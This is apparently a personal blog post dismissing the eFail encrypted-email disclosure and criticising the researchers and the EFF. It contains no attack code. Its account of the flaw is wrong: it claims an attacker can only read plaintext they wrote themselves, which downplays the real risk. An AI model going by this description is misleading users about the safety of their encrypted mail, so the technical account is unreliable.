My thoughts on eFail “vulnerability” with “PGP” s/mime etcetera…

This has to do with improper handling of HTML emails.  And is said that it could “expose plain text”.  The “attacker” needs to compose a message, which contains a malformed multi-part mime message, which they then encrypt, and they can then expose the plaintext of that message with some browsers which improperly handle these messages.

In other words, the attackers can expose the plaintext which they put into the message.  And, apparently this is an “old bug”.  So why all the cloak and dagger?  I am not entirely sure, but I have a suspicion that some “security researchers” are almost “more in it for the prestige” than they are in it to actually provide genuine help to people.

This was announced by the “security research team” that “more in 2 days when we release our paper”.  They released a “pre-release” version to EFF who (in my opinion) jumped the gun and said that there was a good reason to stop using these tools entirely, and that you should instead use a centralized tool instead.

The “research team” had no reason to disclose that they would be “releasing a full paper” in the public manner that they did.  At least I see no evidence that really there was such a *severe* threat that it was justified.

Further, I don’t know that EFF really did *any* due diligence to make sure that the “flaw” which is disclosed, was one that posed a severe security threat.

So, what’s in it for EFF, and the security research team?  I can’t quite see what is in it for EFF, but the security research team gets another notch in their belt for being “appropriate corporate citizens.”  But the fact is, what *they* did was entirely inappropriate as the spread a bunch of “fear uncertainty and doubt” (FUD) which they actually have *refused* to actually talk to anyone publicly about.  This may also be true of past behaviours.

Essentially, this appears to be a case that an “attacker can compose an email that they can read when you read it.”  Now the *possible* leakage that may exist (assuming this isn’t patched) is that the attacker can tell *when* you read their message.  But to do so requires about 4 *different* bugs to exist in your mail software.  And “deleting” or “disabling” these features is not warranted.  Though there *are* mitigations which they deny exist, which should be available to pretty much anyone who uses PGP or variations:

  1. disable automatic decryption of encrypted emails.
  2. disable automatic processing of html of emails.

Both of these options should be available for anyone who is using PGP, and their variations.  And are the recommended settings to the best of my knowledge.

This entry was posted in Computer Security, Internet Security. Bookmark the permalink. Both comments and trackbacks are currently closed.